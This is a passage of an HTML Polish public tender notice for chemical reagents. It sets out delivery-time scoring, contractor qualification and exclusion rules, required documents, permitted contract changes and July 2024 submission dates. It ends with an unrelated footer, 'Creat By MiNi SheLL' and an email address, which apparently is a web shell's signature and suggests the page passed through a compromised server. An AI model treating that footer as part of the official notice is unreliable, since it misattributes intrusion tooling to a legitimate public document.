dniach.<br/>2.2.2 Wykonawca ma obowiązek zaoferować przynajmniej maksymalny termin realizacji dostawy przedmiotu zamówienia<br/>oczekiwany przez Zamawiającego, czyli do 14 dni kalendarzowych, licząc od dnia złożenia zamówienia, o którym mowa w § 3 ust. 6<br/>projektowanych postanowień umowy.<br/>2.2.3 Minimalny punktowany termin realizacji dostawy przedmiotu zamówienia wynosi 7 dni kalendarzowych, licząc od dnia złożenia zamówienia. Jeżeli Wykonawca wskaże w ofercie krótszy termin dostawy niż 7 dni kalendarzowych do porównania i oceny ofert<br/>Zamawiający przyjmie wartość 7 dni kalendarzowych, natomiast do umowy zostanie przyjęty termin dostawy zgodnie z ofertą<br/>Wykonawcy.<br/>2.2.4 Jeżeli Wykonawca wskaże w ofercie dłuższy termin wykonania zamówienia niż 14 dni kalendarzowych, licząc od dnia zawarcia<br/>umowy, jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) uPzp.<br/>2.2.5 Brak podania Formularzu oferty terminu wykonania zamówienia oznaczać będzie, że Wykonawca zaoferuje wymagany przez<br/>Zamawiającego podstawowy termin wynoszący 14 kalendarzowe, licząc od dnia złożenia zamówienia.<br/>2.2.6 Wykonawca zobowiązany jest w Formularzu oferty podać pełne dni kalendarzowe (np. 10 dni, 7 dni). Jeśli Wykonawca poda<br/>niepełne dni kalendarzowe Zamawiający zaokrągla w górę i przyjmuje wyższą wartość do oceny (np. jeśli Wykonawca wskaże<br/>wykonanie: 10,5 dnia Zamawiający zaokrągla tę wartość do 11 dni).<br/>3. Za najkorzystniejszą zostanie uznana oferta z najwyższą liczba punktów.<br/>4. Zamawiający oceni i porówna oferty niepodlegające odrzuceniu, złożone przez Wykonawców niepodlegających wykluczeniu z<br/>niniejszego postępowania.<br/>5. Wartości C, będą wyliczane z dokładnością do dwóch miejsc po przecinku, wg zasady, że trzecia cyfra po przecinku od 5 w górę<br/>powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeżeli trzecia cyfra po przecinku jest niższa od 5, to druga cyfra po<br/>przecinku nie ulega zmianie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy zamawianych odczynników w ramach zamówień podstawowych i opcjonalnych (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1. nie podlegają wykluczeniu:<br/>1.1.1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę na postawie art. 108 ust. 1 uPzp, w art. 109 ust. 1<br/>pkt 4, 7, 8 i 10 oraz z postępowania o udzielenie zamówienia Zamawiający wykluczy Wykonawcę, wobec którego zachodzą<br/>przesłanki określone w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>1.2. 1.1. spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1. zdolności do występowania w obrocie gospodarczym<br/>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga zdolności do występowania w obrocie<br/>gospodarczym.<br/>1.2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>Zamawiający nie stawia warunku w tym zakresie;<br/>1.2.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunków w ww. zakresie.<br/>1.2.4. zdolności technicznej lub zawodowej DLA ZADANIA 1,<br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że należycie zrealizował w okresie ostatnich 3 lat od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedną dostawę odczynników chemicznych na kwotę co najmniej 80 000,00 zł brutto.<br/>Dla ZADANIA nr 2 i nr 3 Zamawiający nie stawia warunków w zakresie zdolności technicznej i zawodowej.<br/><br/>Legenda:<br/>•	Okres wyrażony w latach, o których mowa w ust. 1.2.4. powyżej, liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>•	Jedna dostawa oznacza łączną wartość dostaw wykonanych na podstawie jednej umowy.<br/>•	Do przeliczenia wartości występujących w innych walutach niż PLN Zamawiający jako kurs przeliczeniowy przyjmie średni kurs Narodowego Banku Polskiego (NBP), z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, przy czym średnie kursy walut dostępne są pod następującym adresem internetowym: http://www.nbp.pl/home.aspx?f=/Kursy/kursy.html<br/><br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia przez dwóch lub więcej<br/>Wykonawców, Zamawiający uzna warunek, określony w pkt 1.2.4.1 za spełniony, jeżeli przynajmniej jeden z Wykonawców<br/>spełni wymagany warunek samodzielnie.<br/>3. Zgodnie z art. 116 ust. 1 uPzp, oceniając zdolność techniczną lub zawodową Zamawiający może, na każdym etapie<br/>postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych<br/>interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia<br/>gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4. Wykonawca może w celu potwierdzenia spełniania warunków w stosownych sytuacjach oraz w odniesieniu do<br/>konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej<br/>lub ekonomicznej innych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim<br/>stosunków prawnych.<br/>4.1. W takim przypadku podmiot udostępniający zasoby może w odniesieniu do warunku określonego w ppkt 1.2.4. powyżej<br/>spełnić go samodzielnie.<br/>4.2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te<br/>zdolności są wymagane.<br/>5. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków<br/>udziału w postępowaniu, o których mowa w pkt. 1.2.4, a także bada, czy nie zachodzą wobec tego podmiotu podstawy<br/>wykluczenia, które zostały przewidziane względem Wykonawcy (zgodnie z katalogiem dokumentów i oświadczeń, o których<br/>mowa w rozdz. VII SWZ dot. podstaw wykluczenia).<br/>6. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający żąda, aby Wykonawca w terminie<br/>określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie<br/>spełnia warunki udziału w postępowaniu. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z<br/>Wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez Zamawiającego<br/>powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi w<br/>7. Wykonawca nie może, po upływie terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie<br/>składania wniosków o dopuszczenie do udziału<br/>w postępowaniu albo ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>1.1. potwierdzających brak podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego:<br/>1.1.1. oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 uPzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w zakresie przesłanek, o których mowa w art. 108<br/>ust. 1 oraz 109 ust. 1 pkt 7, 8 i 10 uPzp.<br/>Wzór oświadczenia stanowi Załącznik nr 8 do SWZ;<br/>1.1.2. odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 uPzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji, a także w zakresie art. 7 ust. 1 ustawy sankcyjnej.<br/>2. W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia każdy z Wykonawców<br/>składa podmiotowe środki dowodowe, o których mowa<br/>w pkt II. 1.1, dotyczące każdego z nich, potwierdzających, że nie zachodzą wobec nich podstawy wykluczenia z postępowania.<br/>3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu, o którym<br/>mowa w pkt II. 1.1.2 składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejscezamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w<br/>innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokumenty powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>4. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy, nie wydaje się dokumentów, o których mowa w pkt 4 powyżej, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce<br/>zamieszkania osoby, której dokument miał dotyczyć . Dokumenty powinny być wystawione nie wcześniej niż 3 miesiące przed ich<br/>złożeniem;<br/>5. Do podmiotów udostępniających zasoby na zasadach określonych w art. 118 uPzp mających siedzibę lub miejsce zamieszkania<br/>poza terytorium Rzeczypospolitej Polskiej, pkt 4-5 stosuje się odpowiednio.<br/>6. Zamawiający nie żąda podmiotowych środków dowodowych od podwykonawcy, który nie jest podmiotem udostępniającym<br/>zasoby na zasadach określonych w art. 118 uPzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>1.2. potwierdzających spełnianie przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej i<br/>zawodowej:<br/>1.2.1. Wykaz dostaw wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy;<br/>Uwaga:<br/>Wzór wykazu stanowi Załącznik nr 6 do SWZ.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw, wykonywanych wspólnie z innymi Wykonawcami, wykaz<br/>dotyczy dostaw, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>Okres wyrażony w latach lub miesiącach, liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>2. Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 uPzp, przedstawienia podmiotowych<br/>środków dowodowych, o których mowa w pkt II 1.1 powyżej, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec<br/>tych podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> OFERTA SKŁADA SIĘ Z:<br/>1.Formularza oferty sporządzonego według wzoru stanowiącego Zał. nr 1 do SWZ;<br/>2.Formularza Kalkulacyjnego – wypełniony i podpisany Zał.nr 3, dla zadania na które jest składana oferta;<br/>3. Oświadczenia, o którym mowa w art. 125 ust. 1 uPzp - Zał. nr 2 do SWZtj. oświadczenie, o którym mowa w art. 125 ust. 1<br/>uPzp o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez<br/>Zamawiającego. Oświadczenie to stanowi dowód potwierdzający brak podstaw do wykluczenia, spełnienie warunków<br/>udziału w postępowaniu, odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego<br/>podmiotowe środki dowodowe.<br/>3.1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie,<br/>o którym mowa powyżej, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>3.2. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniem, o którym mowa w ust. 1 powyżej, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>4. (jeżeli dotyczy), w przypadku oferowania rozwiązań równoważnych Wykonawca składa w szczególności przedmiotowe<br/>środki dowodowe, o których mowa w rozdziale VII pkt III SWZ ppkt 2.1 - 2.5, udowadniające, że proponowane rozwiązania<br/>w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia (jeżeli dotyczy);<br/>5. Pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy dla osoby/osób<br/>podpisującej/cych ofertę odpowiednio zgodnie z pkt 8 lub 9 rozdziału XI SWZ;<br/>6. (jeżeli dotyczy) zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy, o którym mowa<br/>w rozdziale VII pkt I ppkt 4 SWZ (Załącznik nr 5 do SWZ); tj. Wykonawca, który polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, składa zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowypotwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby potwierdza, że stosunek łączący Wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>Wzór zobowiązania podmiotu udostępniającego stanowi Załącznik nr 5 do SWZ.<br/>7. (jeżeli dotyczy) W przypadku, gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu<br/>przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, Wykonawca, w celu utrzymania w<br/>poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku – szczegóły opisane w pkt 7<br/>rozdziału XI SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> spółki cywilne, konsorcja), zgodnie z art. 58 ust. 2 uPzp zobowiązani są ustanowić pełnomocnika do reprezentowania<br/>Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Wszelka korespondencja oraz rozliczenia prowadzone będą wyłącznie z podmiotem występującym jako pełnomocnik.<br/>3. Pełnomocnictwo musi być opatrzone przez osobę/osoby uprawnioną(-e) do jego udzielenia tj.: zgodnie z formą<br/>reprezentacji każdego z Wykonawców kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem<br/>osobistym. Punkt 8.6 Rozdziału XI SWZ stosuje się odpowiednio.<br/>4. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>5. Wykaz dokumentów składanych wraz z ofertą, w przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, został określony w rozdziale VII pkt I SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> do treści Oferty Wykonawcy:<br/>1.1 zmiana terminu wykonania poszczególnych dostaw w następujących sytuacjach:<br/>a) przestojów i opóźnień powstałych z przyczyn obiektywnych, nie leżących po stronie Wykonawcy,<br/>b) przestojów i opóźnień powstałych z winy Zamawiającego mających bezpośredni wpływ na terminowość realizacji<br/>przedmiotu umowy,<br/>c) z powodu wystąpienia siły wyższej;<br/>1.2 wydłużenie „Pierwotnego okresu obowiązywania umowy” o okres nie dłuższy niż 12 miesięcy (Zamawiający dopuszcza<br/>zawarcie kilku aneksów wydłużających czas obowiązywania umowy łącznie nie dłużej niż o 12 miesięcy), w przypadku<br/>niewyczerpania wartości całkowitego maksymalnego wynagrodzenia brutto, o której mowa w § 2 ust. 1;<br/>1.3 zmiany wynikające ze zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację<br/>przedmiotu zamówienia;<br/>1.4 rezygnacja Wykonawcy z Podwykonawcy lub zmiany Podwykonawcy, przy czym, jeżeli zmiana albo rezygnacja z<br/>Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powołał się, na zasadach określonych w art. 118 ust. 1<br/>p.z.p., w celu wykazania spełnienia warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać<br/>Zamawiającemu, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym<br/>niż Podwykonawca, na którego zasoby Wykonawca powołał się w trakcie postępowania o udzielenie zamówienia. Przepis<br/>art. 122 p.z.p. stosuje się odpowiednio;<br/>1.5 zmiany Wykonawcy na warunkach określonych w art. 455 ust. 1 pkt 2 lit. b) p.z.p.;<br/>1.6 zmiana rachunku bankowego Wykonawcy.<br/>2. 2.Warunki zmiany umowy wskazane są w § 10 umowy - Załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/uniwersytet_wroclawski/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com